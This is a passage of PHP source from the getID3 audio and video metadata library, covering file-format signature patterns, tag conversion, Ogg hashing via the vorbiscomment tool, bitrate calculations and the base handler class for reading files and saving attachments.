data - RAR compressed data 'rar' => array( 'pattern' => '^Rar\\!', 'group' => 'archive', 'module' => 'rar', 'mime_type' => 'application/vnd.rar', 'fail_id3' => 'ERROR', 'fail_ape' => 'ERROR', ), // SZIP - audio/data - SZIP compressed data 'szip' => array( 'pattern' => '^SZ\\x0A\\x04', 'group' => 'archive', 'module' => 'szip', 'mime_type' => 'application/octet-stream', 'fail_id3' => 'ERROR', 'fail_ape' => 'ERROR', ), // TAR - data - TAR compressed data 'tar' => array( 'pattern' => '^.{100}[0-9\\x20]{7}\\x00[0-9\\x20]{7}\\x00[0-9\\x20]{7}\\x00[0-9\\x20\\x00]{12}[0-9\\x20\\x00]{12}', 'group' => 'archive', 'module' => 'tar', 'mime_type' => 'application/x-tar', 'fail_id3' => 'ERROR', 'fail_ape' => 'ERROR', ), // GZIP - data - GZIP compressed data 'gz' => array( 'pattern' => '^\\x1F\\x8B\\x08', 'group' => 'archive', 'module' => 'gzip', 'mime_type' => 'application/gzip', 'fail_id3' => 'ERROR', 'fail_ape' => 'ERROR', ), // ZIP - data - ZIP compressed data 'zip' => array( 'pattern' => '^PK\\x03\\x04', 'group' => 'archive', 'module' => 'zip', 'mime_type' => 'application/zip', 'fail_id3' => 'ERROR', 'fail_ape' => 'ERROR', ), // XZ - data - XZ compressed data 'xz' => array( 'pattern' => '^\\xFD7zXZ\\x00', 'group' => 'archive', 'module' => 'xz', 'mime_type' => 'application/x-xz', 'fail_id3' => 'ERROR', 'fail_ape' => 'ERROR', ), // XZ - data - XZ compressed data '7zip' => array( 'pattern' => '^7z\\xBC\\xAF\\x27\\x1C', 'group' => 'archive', 'module' => '7zip', 'mime_type' => 'application/x-7z-compressed', 'fail_id3' => 'ERROR', 'fail_ape' => 'ERROR', ), // Misc other formats // PAR2 - data - Parity Volume Set Specification 2.0 'par2' => array ( 'pattern' => '^PAR2\\x00PKT', 'group' => 'misc', 'module' => 'par2', 'mime_type' => 'application/octet-stream', 'fail_id3' => 'ERROR', 'fail_ape' => 'ERROR', ), // PDF - data - Portable Document Format 'pdf' => array( 'pattern' => '^\\x25PDF', 'group' => 'misc', 'module' => 'pdf', 'mime_type' => 'application/pdf', 'fail_id3' => 'ERROR', 'fail_ape' => 'ERROR', ), // MSOFFICE - data - ZIP compressed data 'msoffice' => array( 'pattern' => '^\\xD0\\xCF\\x11\\xE0\\xA1\\xB1\\x1A\\xE1', // D0CF11E == DOCFILE == Microsoft Office Document 'group' => 'misc', 'module' => 'msoffice', 'mime_type' => 'application/octet-stream', 'fail_id3' => 'ERROR', 'fail_ape' => 'ERROR', ), // TORRENT - .torrent 'torrent' => array( 'pattern' => '^(d8\\:announce|d7\\:comment)', 'group' => 'misc', 'module' => 'torrent', 'mime_type' => 'application/x-bittorrent', 'fail_id3' => 'ERROR', 'fail_ape' => 'ERROR', ), // CUE - data - CUEsheet (index to single-file disc images) 'cue' => array( 'pattern' => '', // empty pattern means cannot be automatically detected, will fall through all other formats and match based on filename and very basic file contents 'group' => 'misc', 'module' => 'cue', 'mime_type' => 'application/octet-stream', ), ); } return $format_info; } /** * @param string $filedata * @param string $filename * * @return mixed|false */ public function GetFileFormat(&$filedata, $filename='') { // this function will determine the format of a file based on usually // the first 2-4 bytes of the file (8 bytes for PNG, 16 bytes for JPG, // and in the case of ISO CD image, 6 bytes offset 32kb from the start // of the file). // Identify file format - loop through $format_info and detect with reg expr foreach ($this->GetFileFormatArray() as $format_name => $info) { // The /s switch on preg_match() forces preg_match() NOT to treat // newline (0x0A) characters as special chars but do a binary match if (!empty($info['pattern']) && preg_match('#'.$info['pattern'].'#s', $filedata)) { $info['include'] = 'module.'.$info['group'].'.'.$info['module'].'.php'; return $info; } } if (preg_match('#\\.mp[123a]$#i', $filename)) { // Too many mp3 encoders on the market put garbage in front of mpeg files // use assume format on these if format detection failed $GetFileFormatArray = $this->GetFileFormatArray(); $info = $GetFileFormatArray['mp3']; $info['include'] = 'module.'.$info['group'].'.'.$info['module'].'.php'; return $info; } elseif (preg_match('#\\.mp[cp\\+]$#i', $filename) && preg_match('#[\x00\x01\x10\x11\x40\x41\x50\x51\x80\x81\x90\x91\xC0\xC1\xD0\xD1][\x20-37][\x00\x20\x40\x60\x80\xA0\xC0\xE0]#s', $filedata)) { // old-format (SV4-SV6) Musepack header that has a very loose pattern match and could falsely match other data (e.g. corrupt mp3) // only enable this pattern check if the filename ends in .mpc/mpp/mp+ $GetFileFormatArray = $this->GetFileFormatArray(); $info = $GetFileFormatArray['mpc']; $info['include'] = 'module.'.$info['group'].'.'.$info['module'].'.php'; return $info; } elseif (preg_match('#\\.cue$#i', $filename) && preg_match('#FILE "[^"]+" (BINARY|MOTOROLA|AIFF|WAVE|MP3)#', $filedata)) { // there's not really a useful consistent "magic" at the beginning of .cue files to identify them // so until I think of something better, just go by filename if all other format checks fail // and verify there's at least one instance of "TRACK xx AUDIO" in the file $GetFileFormatArray = $this->GetFileFormatArray(); $info = $GetFileFormatArray['cue']; $info['include'] = 'module.'.$info['group'].'.'.$info['module'].'.php'; return $info; } return false; } /** * Converts array to $encoding charset from $this->encoding. * * @param array $array * @param string $encoding */ public function CharConvert(&$array, $encoding) { // identical encoding - end here if ($encoding == $this->encoding) { return; } // loop thru array foreach ($array as $key => $value) { // go recursive if (is_array($value)) { $this->CharConvert($array[$key], $encoding); } // convert string elseif (is_string($value)) { $array[$key] = trim(getid3_lib::iconv_fallback($encoding, $this->encoding, $value)); } } } /** * @return bool */ public function HandleAllTags() { // key name => array (tag name, character encoding) static $tags; if (empty($tags)) { $tags = array( 'asf' => array('asf' , 'UTF-16LE'), 'midi' => array('midi' , 'ISO-8859-1'), 'nsv' => array('nsv' , 'ISO-8859-1'), 'ogg' => array('vorbiscomment' , 'UTF-8'), 'png' => array('png' , 'UTF-8'), 'tiff' => array('tiff' , 'ISO-8859-1'), 'quicktime' => array('quicktime' , 'UTF-8'), 'real' => array('real' , 'ISO-8859-1'), 'vqf' => array('vqf' , 'ISO-8859-1'), 'zip' => array('zip' , 'ISO-8859-1'), 'riff' => array('riff' , 'ISO-8859-1'), 'lyrics3' => array('lyrics3' , 'ISO-8859-1'), 'id3v1' => array('id3v1' , $this->encoding_id3v1), 'id3v2' => array('id3v2' , 'UTF-8'), // not according to the specs (every frame can have a different encoding), but getID3() force-converts all encodings to UTF-8 'ape' => array('ape' , 'UTF-8'), 'cue' => array('cue' , 'ISO-8859-1'), 'matroska' => array('matroska' , 'UTF-8'), 'flac' => array('vorbiscomment' , 'UTF-8'), 'divxtag' => array('divx' , 'ISO-8859-1'), 'iptc' => array('iptc' , 'ISO-8859-1'), 'dsdiff' => array('dsdiff' , 'ISO-8859-1'), ); } // loop through comments array foreach ($tags as $comment_name => $tagname_encoding_array) { list($tag_name, $encoding) = $tagname_encoding_array; // fill in default encoding type if not already present if (isset($this->info[$comment_name]) && !isset($this->info[$comment_name]['encoding'])) { $this->info[$comment_name]['encoding'] = $encoding; } // copy comments if key name set if (!empty($this->info[$comment_name]['comments'])) { foreach ($this->info[$comment_name]['comments'] as $tag_key => $valuearray) { foreach ($valuearray as $key => $value) { if (is_string($value)) { $value = trim($value, " \r\n\t"); // do not trim nulls from $value!! Unicode characters will get mangled if trailing nulls are removed! } if (isset($value) && $value !== "") { if (!is_numeric($key)) { $this->info['tags'][trim($tag_name)][trim($tag_key)][$key] = $value; } else { $this->info['tags'][trim($tag_name)][trim($tag_key)][] = $value; } } } if ($tag_key == 'picture') { // pictures can take up a lot of space, and we don't need multiple copies of them; let there be a single copy in [comments][picture], and not elsewhere unset($this->info[$comment_name]['comments'][$tag_key]); } } if (!isset($this->info['tags'][$tag_name])) { // comments are set but contain nothing but empty strings, so skip continue; } $this->CharConvert($this->info['tags'][$tag_name], $this->info[$comment_name]['encoding']); // only copy gets converted! if ($this->option_tags_html) { foreach ($this->info['tags'][$tag_name] as $tag_key => $valuearray) { if ($tag_key == 'picture') { // Do not to try to convert binary picture data to HTML // https://github.com/JamesHeinrich/getID3/issues/178 continue; } $this->info['tags_html'][$tag_name][$tag_key] = getid3_lib::recursiveMultiByteCharString2HTML($valuearray, $this->info[$comment_name]['encoding']); } } } } // pictures can take up a lot of space, and we don't need multiple copies of them; let there be a single copy in [comments][picture], and not elsewhere if (!empty($this->info['tags'])) { $unset_keys = array('tags', 'tags_html'); foreach ($this->info['tags'] as $tagtype => $tagarray) { foreach ($tagarray as $tagname => $tagdata) { if ($tagname == 'picture') { foreach ($tagdata as $key => $tagarray) { $this->info['comments']['picture'][] = $tagarray; if (isset($tagarray['data']) && isset($tagarray['image_mime'])) { if (isset($this->info['tags'][$tagtype][$tagname][$key])) { unset($this->info['tags'][$tagtype][$tagname][$key]); } if (isset($this->info['tags_html'][$tagtype][$tagname][$key])) { unset($this->info['tags_html'][$tagtype][$tagname][$key]); } } } } } foreach ($unset_keys as $unset_key) { // remove possible empty keys from (e.g. [tags][id3v2][picture]) if (empty($this->info[$unset_key][$tagtype]['picture'])) { unset($this->info[$unset_key][$tagtype]['picture']); } if (empty($this->info[$unset_key][$tagtype])) { unset($this->info[$unset_key][$tagtype]); } if (empty($this->info[$unset_key])) { unset($this->info[$unset_key]); } } // remove duplicate copy of picture data from (e.g. [id3v2][comments][picture]) if (isset($this->info[$tagtype]['comments']['picture'])) { unset($this->info[$tagtype]['comments']['picture']); } if (empty($this->info[$tagtype]['comments'])) { unset($this->info[$tagtype]['comments']); } if (empty($this->info[$tagtype])) { unset($this->info[$tagtype]); } } } return true; } /** * Calls getid3_lib::CopyTagsToComments() but passes in the option_tags_html setting from this instance of getID3 * * @param array $ThisFileInfo * * @return bool */ public function CopyTagsToComments(&$ThisFileInfo) { return getid3_lib::CopyTagsToComments($ThisFileInfo, $this->option_tags_html); } /** * @param string $algorithm * * @return array|bool */ public function getHashdata($algorithm) { switch ($algorithm) { case 'md5': case 'sha1': break; default: return $this->error('bad algorithm "'.$algorithm.'" in getHashdata()'); } if (!empty($this->info['fileformat']) && !empty($this->info['dataformat']) && ($this->info['fileformat'] == 'ogg') && ($this->info['audio']['dataformat'] == 'vorbis')) { // We cannot get an identical md5_data value for Ogg files where the comments // span more than 1 Ogg page (compared to the same audio data with smaller // comments) using the normal getID3() method of MD5'ing the data between the // end of the comments and the end of the file (minus any trailing tags), // because the page sequence numbers of the pages that the audio data is on // do not match. Under normal circumstances, where comments are smaller than // the nominal 4-8kB page size, then this is not a problem, but if there are // very large comments, the only way around it is to strip off the comment // tags with vorbiscomment and MD5 that file. // This procedure must be applied to ALL Ogg files, not just the ones with // comments larger than 1 page, because the below method simply MD5's the // whole file with the comments stripped, not just the portion after the // comments block (which is the standard getID3() method. // The above-mentioned problem of comments spanning multiple pages and changing // page sequence numbers likely happens for OggSpeex and OggFLAC as well, but // currently vorbiscomment only works on OggVorbis files. // phpcs:ignore PHPCompatibility.IniDirectives.RemovedIniDirectives.safe_modeDeprecatedRemoved if (preg_match('#(1|ON)#i', ini_get('safe_mode'))) { $this->warning('Failed making system call to vorbiscomment.exe - '.$algorithm.'_data is incorrect - error returned: PHP running in Safe Mode (backtick operator not available)'); $this->info[$algorithm.'_data'] = false; } else { // Prevent user from aborting script $old_abort = ignore_user_abort(true); // Create empty file $empty = tempnam(GETID3_TEMP_DIR, 'getID3'); touch($empty); // Use vorbiscomment to make temp file without comments $temp = tempnam(GETID3_TEMP_DIR, 'getID3'); $file = $this->info['filenamepath']; if (GETID3_OS_ISWINDOWS) { if (file_exists(GETID3_HELPERAPPSDIR.'vorbiscomment.exe')) { $commandline = '"'.GETID3_HELPERAPPSDIR.'vorbiscomment.exe" -w -c "'.$empty.'" "'.$file.'" "'.$temp.'"'; $VorbisCommentError = `$commandline`; } else { $VorbisCommentError = 'vorbiscomment.exe not found in '.GETID3_HELPERAPPSDIR; } } else { $commandline = 'vorbiscomment -w -c '.escapeshellarg($empty).' '.escapeshellarg($file).' '.escapeshellarg($temp).' 2>&1'; $VorbisCommentError = `$commandline`; } if (!empty($VorbisCommentError)) { $this->warning('Failed making system call to vorbiscomment(.exe) - '.$algorithm.'_data will be incorrect. If vorbiscomment is unavailable, please download from http://www.vorbis.com/download.psp and put in the getID3() directory. Error returned: '.$VorbisCommentError); $this->info[$algorithm.'_data'] = false; } else { // Get hash of newly created file switch ($algorithm) { case 'md5': $this->info[$algorithm.'_data'] = md5_file($temp); break; case 'sha1': $this->info[$algorithm.'_data'] = sha1_file($temp); break; } } // Clean up unlink($empty); unlink($temp); // Reset abort setting ignore_user_abort($old_abort); } } else { if (!empty($this->info['avdataoffset']) || (isset($this->info['avdataend']) && ($this->info['avdataend'] < $this->info['filesize']))) { // get hash from part of file $this->info[$algorithm.'_data'] = getid3_lib::hash_data($this->info['filenamepath'], $this->info['avdataoffset'], $this->info['avdataend'], $algorithm); } else { // get hash from whole file switch ($algorithm) { case 'md5': $this->info[$algorithm.'_data'] = md5_file($this->info['filenamepath']); break; case 'sha1': $this->info[$algorithm.'_data'] = sha1_file($this->info['filenamepath']); break; } } } return true; } public function ChannelsBitratePlaytimeCalculations() { // set channelmode on audio if (!empty($this->info['audio']['channelmode']) || !isset($this->info['audio']['channels'])) { // ignore } elseif ($this->info['audio']['channels'] == 1) { $this->info['audio']['channelmode'] = 'mono'; } elseif ($this->info['audio']['channels'] == 2) { $this->info['audio']['channelmode'] = 'stereo'; } // Calculate combined bitrate - audio + video $CombinedBitrate = 0; $CombinedBitrate += (isset($this->info['audio']['bitrate']) ? $this->info['audio']['bitrate'] : 0); $CombinedBitrate += (isset($this->info['video']['bitrate']) ? $this->info['video']['bitrate'] : 0); if (($CombinedBitrate > 0) && empty($this->info['bitrate'])) { $this->info['bitrate'] = $CombinedBitrate; } //if ((isset($this->info['video']) && !isset($this->info['video']['bitrate'])) || (isset($this->info['audio']) && !isset($this->info['audio']['bitrate']))) { // // for example, VBR MPEG video files cannot determine video bitrate: // // should not set overall bitrate and playtime from audio bitrate only // unset($this->info['bitrate']); //} // video bitrate undetermined, but calculable if (isset($this->info['video']['dataformat']) && $this->info['video']['dataformat'] && (!isset($this->info['video']['bitrate']) || ($this->info['video']['bitrate'] == 0))) { // if video bitrate not set if (isset($this->info['audio']['bitrate']) && ($this->info['audio']['bitrate'] > 0) && ($this->info['audio']['bitrate'] == $this->info['bitrate'])) { // AND if audio bitrate is set to same as overall bitrate if (isset($this->info['playtime_seconds']) && ($this->info['playtime_seconds'] > 0)) { // AND if playtime is set if (isset($this->info['avdataend']) && isset($this->info['avdataoffset'])) { // AND if AV data offset start/end is known // THEN we can calculate the video bitrate $this->info['bitrate'] = round((($this->info['avdataend'] - $this->info['avdataoffset']) * 8) / $this->info['playtime_seconds']); $this->info['video']['bitrate'] = $this->info['bitrate'] - $this->info['audio']['bitrate']; } } } } if ((!isset($this->info['playtime_seconds']) || ($this->info['playtime_seconds'] <= 0)) && !empty($this->info['bitrate'])) { $this->info['playtime_seconds'] = (($this->info['avdataend'] - $this->info['avdataoffset']) * 8) / $this->info['bitrate']; } if (!isset($this->info['bitrate']) && !empty($this->info['playtime_seconds'])) { $this->info['bitrate'] = (($this->info['avdataend'] - $this->info['avdataoffset']) * 8) / $this->info['playtime_seconds']; } if (isset($this->info['bitrate']) && empty($this->info['audio']['bitrate']) && empty($this->info['video']['bitrate'])) { if (isset($this->info['audio']['dataformat']) && empty($this->info['video']['resolution_x'])) { // audio only $this->info['audio']['bitrate'] = $this->info['bitrate']; } elseif (isset($this->info['video']['resolution_x']) && empty($this->info['audio']['dataformat'])) { // video only $this->info['video']['bitrate'] = $this->info['bitrate']; } } // Set playtime string if (!empty($this->info['playtime_seconds']) && empty($this->info['playtime_string'])) { $this->info['playtime_string'] = getid3_lib::PlaytimeString($this->info['playtime_seconds']); } } /** * @return bool */ public function CalculateCompressionRatioVideo() { if (empty($this->info['video'])) { return false; } if (empty($this->info['video']['resolution_x']) || empty($this->info['video']['resolution_y'])) { return false; } if (empty($this->info['video']['bits_per_sample'])) { return false; } switch ($this->info['video']['dataformat']) { case 'bmp': case 'gif': case 'jpeg': case 'jpg': case 'png': case 'tiff': $FrameRate = 1; $PlaytimeSeconds = 1; $BitrateCompressed = $this->info['filesize'] * 8; break; default: if (!empty($this->info['video']['frame_rate'])) { $FrameRate = $this->info['video']['frame_rate']; } else { return false; } if (!empty($this->info['playtime_seconds'])) { $PlaytimeSeconds = $this->info['playtime_seconds']; } else { return false; } if (!empty($this->info['video']['bitrate'])) { $BitrateCompressed = $this->info['video']['bitrate']; } else { return false; } break; } $BitrateUncompressed = $this->info['video']['resolution_x'] * $this->info['video']['resolution_y'] * $this->info['video']['bits_per_sample'] * $FrameRate; $this->info['video']['compression_ratio'] = getid3_lib::SafeDiv($BitrateCompressed, $BitrateUncompressed, 1); return true; } /** * @return bool */ public function CalculateCompressionRatioAudio() { if (empty($this->info['audio']['bitrate']) || empty($this->info['audio']['channels']) || empty($this->info['audio']['sample_rate']) || !is_numeric($this->info['audio']['sample_rate'])) { return false; } $this->info['audio']['compression_ratio'] = $this->info['audio']['bitrate'] / ($this->info['audio']['channels'] * $this->info['audio']['sample_rate'] * (!empty($this->info['audio']['bits_per_sample']) ? $this->info['audio']['bits_per_sample'] : 16)); if (!empty($this->info['audio']['streams'])) { foreach ($this->info['audio']['streams'] as $streamnumber => $streamdata) { if (!empty($streamdata['bitrate']) && !empty($streamdata['channels']) && !empty($streamdata['sample_rate'])) { $this->info['audio']['streams'][$streamnumber]['compression_ratio'] = $streamdata['bitrate'] / ($streamdata['channels'] * $streamdata['sample_rate'] * (!empty($streamdata['bits_per_sample']) ? $streamdata['bits_per_sample'] : 16)); } } } return true; } /** * @return bool */ public function CalculateReplayGain() { if (isset($this->info['replay_gain'])) { if (!isset($this->info['replay_gain']['reference_volume'])) { $this->info['replay_gain']['reference_volume'] = 89.0; } if (isset($this->info['replay_gain']['track']['adjustment'])) { $this->info['replay_gain']['track']['volume'] = $this->info['replay_gain']['reference_volume'] - $this->info['replay_gain']['track']['adjustment']; } if (isset($this->info['replay_gain']['album']['adjustment'])) { $this->info['replay_gain']['album']['volume'] = $this->info['replay_gain']['reference_volume'] - $this->info['replay_gain']['album']['adjustment']; } if (isset($this->info['replay_gain']['track']['peak'])) { $this->info['replay_gain']['track']['max_noclip_gain'] = 0 - getid3_lib::RGADamplitude2dB($this->info['replay_gain']['track']['peak']); } if (isset($this->info['replay_gain']['album']['peak'])) { $this->info['replay_gain']['album']['max_noclip_gain'] = 0 - getid3_lib::RGADamplitude2dB($this->info['replay_gain']['album']['peak']); } } return true; } /** * @return bool */ public function ProcessAudioStreams() { if (!empty($this->info['audio']['bitrate']) || !empty($this->info['audio']['channels']) || !empty($this->info['audio']['sample_rate'])) { if (!isset($this->info['audio']['streams'])) { foreach ($this->info['audio'] as $key => $value) { if ($key != 'streams') { $this->info['audio']['streams'][0][$key] = $value; } } } } return true; } /** * @return string|bool */ public function getid3_tempnam() { return tempnam($this->tempdir, 'gI3'); } /** * @param string $name * * @return bool * * @throws getid3_exception */ public function include_module($name) { //if (!file_exists($this->include_path.'module.'.$name.'.php')) { if (!file_exists(GETID3_INCLUDEPATH.'module.'.$name.'.php')) { throw new getid3_exception('Required module.'.$name.'.php is missing.'); } include_once(GETID3_INCLUDEPATH.'module.'.$name.'.php'); return true; } /** * @param string $filename * * @return bool */ public static function is_writable ($filename) { $ret = is_writable($filename); if (!$ret) { $perms = fileperms($filename); $ret = ($perms & 0x0080) || ($perms & 0x0010) || ($perms & 0x0002); } return $ret; } } abstract class getid3_handler { /** * @var getID3 */ protected $getid3; // pointer /** * Analyzing filepointer or string. * * @var bool */ protected $data_string_flag = false; /** * String to analyze. * * @var string */ protected $data_string = ''; /** * Seek position in string. * * @var int */ protected $data_string_position = 0; /** * String length. * * @var int */ protected $data_string_length = 0; /** * @var string */ private $dependency_to; /** * getid3_handler constructor. * * @param getID3 $getid3 * @param string $call_module */ public function __construct(getID3 $getid3, $call_module=null) { $this->getid3 = $getid3; if ($call_module) { $this->dependency_to = str_replace('getid3_', '', $call_module); } } /** * Analyze from file pointer. * * @return bool */ abstract public function Analyze(); /** * Analyze from string instead. * * @param string $string */ public function AnalyzeString($string) { // Enter string mode $this->setStringMode($string); // Save info $saved_avdataoffset = $this->getid3->info['avdataoffset']; $saved_avdataend = $this->getid3->info['avdataend']; $saved_filesize = (isset($this->getid3->info['filesize']) ? $this->getid3->info['filesize'] : null); // may be not set if called as dependency without openfile() call // Reset some info $this->getid3->info['avdataoffset'] = 0; $this->getid3->info['avdataend'] = $this->getid3->info['filesize'] = $this->data_string_length; // Analyze $this->Analyze(); // Restore some info $this->getid3->info['avdataoffset'] = $saved_avdataoffset; $this->getid3->info['avdataend'] = $saved_avdataend; $this->getid3->info['filesize'] = $saved_filesize; // Exit string mode $this->data_string_flag = false; } /** * @param string $string */ public function setStringMode($string) { $this->data_string_flag = true; $this->data_string = $string; $this->data_string_length = strlen($string); } /** * @phpstan-impure * * @return int|bool */ protected function ftell() { if ($this->data_string_flag) { return $this->data_string_position; } return ftell($this->getid3->fp); } /** * @param int $bytes * * @phpstan-impure * * @return string|false * * @throws getid3_exception */ protected function fread($bytes) { if ($this->data_string_flag) { $this->data_string_position += $bytes; return substr($this->data_string, $this->data_string_position - $bytes, $bytes); } if ($bytes == 0) { return ''; } elseif ($bytes < 0) { throw new getid3_exception('cannot fread('.$bytes.' from '.$this->ftell().')', 10); } $pos = $this->ftell() + $bytes; if (!getid3_lib::intValueSupported($pos)) { throw new getid3_exception('cannot fread('.$bytes.' from '.$this->ftell().') because beyond PHP filesystem limit', 10); } //return fread($this->getid3->fp, $bytes); /* * https://www.getid3.org/phpBB3/viewtopic.php?t=1930 * "I found out that the root cause for the problem was how getID3 uses the PHP system function fread(). * It seems to assume that fread() would always return as many bytes as were requested. * However, according the PHP manual (http://php.net/manual/en/function.fread.php), this is the case only with regular local files, but not e.g. with Linux pipes. * The call may return only part of the requested data and a new call is needed to get more." */ $contents = ''; do { //if (($this->getid3->memory_limit > 0) && ($bytes > $this->getid3->memory_limit)) { if (($this->getid3->memory_limit > 0) && (($bytes / $this->getid3->memory_limit) > 0.99)) { // enable a more-fuzzy match to prevent close misses generating errors like "PHP Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to allocate 33554464 bytes)" throw new getid3_exception('cannot fread('.$bytes.' from '.$this->ftell().') that is more than available PHP memory ('.$this->getid3->memory_limit.')', 10); } $part = fread($this->getid3->fp, $bytes); $partLength = strlen($part); $bytes -= $partLength; $contents .= $part; } while (($bytes > 0) && ($partLength > 0)); return $contents; } /** * @param int $bytes * @param int $whence * * @phpstan-impure * * @return int * * @throws getid3_exception */ protected function fseek($bytes, $whence=SEEK_SET) { if ($this->data_string_flag) { switch ($whence) { case SEEK_SET: $this->data_string_position = $bytes; break; case SEEK_CUR: $this->data_string_position += $bytes; break; case SEEK_END: $this->data_string_position = $this->data_string_length + $bytes; break; } return 0; // fseek returns 0 on success } $pos = $bytes; if ($whence == SEEK_CUR) { $pos = $this->ftell() + $bytes; } elseif ($whence == SEEK_END) { $pos = $this->getid3->info['filesize'] + $bytes; } if (!getid3_lib::intValueSupported($pos)) { throw new getid3_exception('cannot fseek('.$pos.') because beyond PHP filesystem limit', 10); } // https://github.com/JamesHeinrich/getID3/issues/327 $result = fseek($this->getid3->fp, $bytes, $whence); if ($result !== 0) { // fseek returns 0 on success throw new getid3_exception('cannot fseek('.$pos.'). resource/stream does not appear to support seeking', 10); } return $result; } /** * @phpstan-impure * * @return string|false * * @throws getid3_exception */ protected function fgets() { // must be able to handle CR/LF/CRLF but not read more than one lineend $buffer = ''; // final string we will return $prevchar = ''; // save previously-read character for end-of-line checking if ($this->data_string_flag) { while (true) { $thischar = substr($this->data_string, $this->data_string_position++, 1); if (($prevchar == "\r") && ($thischar != "\n")) { // read one byte too many, back up $this->data_string_position--; break; } $buffer .= $thischar; if ($thischar == "\n") { break; } if ($this->data_string_position >= $this->data_string_length) { // EOF break; } $prevchar = $thischar; } } else { // Ideally we would just use PHP's fgets() function, however... // it does not behave consistently with regards to mixed line endings, may be system-dependent // and breaks entirely when given a file with mixed \r vs \n vs \r\n line endings (e.g. some PDFs) //return fgets($this->getid3->fp); while (true) { $thischar = fgetc($this->getid3->fp); if (($prevchar == "\r") && ($thischar != "\n")) { // read one byte too many, back up fseek($this->getid3->fp, -1, SEEK_CUR); break; } $buffer .= $thischar; if ($thischar == "\n") { break; } if (feof($this->getid3->fp)) { break; } $prevchar = $thischar; } } return $buffer; } /** * @phpstan-impure * * @return bool */ protected function feof() { if ($this->data_string_flag) { return $this->data_string_position >= $this->data_string_length; } return feof($this->getid3->fp); } /** * @param string $module * * @return bool */ final protected function isDependencyFor($module) { return $this->dependency_to == $module; } /** * @param string $text * * @return bool */ protected function error($text) { $this->getid3->info['error'][] = $text; return false; } /** * @param string $text * * @return bool */ protected function warning($text) { return $this->getid3->warning($text); } /** * @param string $text */ protected function notice($text) { // does nothing for now } /** * @param string $name * @param int $offset * @param int $length * @param string $image_mime * * @return string|null * * @throws Exception * @throws getid3_exception */ public function saveAttachment($name, $offset, $length, $image_mime=null) { $fp_dest = null; $dest = null; try { // do not extract at all if ($this->getid3->option_save_attachments === getID3::ATTACHMENTS_NONE) { $attachment = null; // do not set any // extract to return array } elseif ($this->getid3->option_save_attachments === getID3::ATTACHMENTS_INLINE) { $this->fseek($offset); $attachment = $this->fread($length); // get whole data in one pass, till it is anyway stored in memory if ($attachment === false || strlen($attachment) != $length) { throw new Exception('failed to read attachment data'); } // assume directory path is given } else { // set up destination path $dir = rtrim(str_replace(array('/', '\\'), DIRECTORY_SEPARATOR, $this->getid3->option_save_attachments), DIRECTORY_SEPARATOR); if (!is_dir($dir) || !getID3::is_writable($dir)) { // check supplied directory throw new Exception('supplied path ('.$dir.') does not exist, or is not writable'); } $dest = $dir.DIRECTORY_SEPARATOR.$name.($image_mime ? '.'.getid3_lib::ImageExtFromMime($image_mime) : ''); // create dest file if (($fp_dest = fopen($dest, 'wb')) == false) { throw new Exception('failed to create file '.$dest); } // copy data $this->fseek($offset); $buffersize = ($this->data_string_flag ? $length : $this->getid3->fread_buffer_size()); $bytesleft = $length; while ($bytesleft > 0) { if (($buffer = $this->fread(min($buffersize, $bytesleft))) === false || ($byteswritten = fwrite($fp_dest, $buffer)) === false || ($byteswritten === 0)) { throw new Exception($buffer === false ? 'not enough data to read' : 'failed to write to destination file, may be not enough disk space'); } $bytesleft -= $byteswritten; } fclose($fp_dest); $attachment = $dest; } } catch (Exception $e) { // close and remove dest file if created if (isset($fp_dest) && is_resource($fp_dest)) { fclose($fp_dest); } if (isset($dest) && file_exists($dest)) { unlink($dest); } // do not set any is case of error $attachment = null; $this->warning('Failed to extract attachment '.$name.': '.$e->getMessage()); } // seek to the end of attachment $this->fseek($offset + $length); return $attachment; } } class getid3_exception extends Exception { public $message; }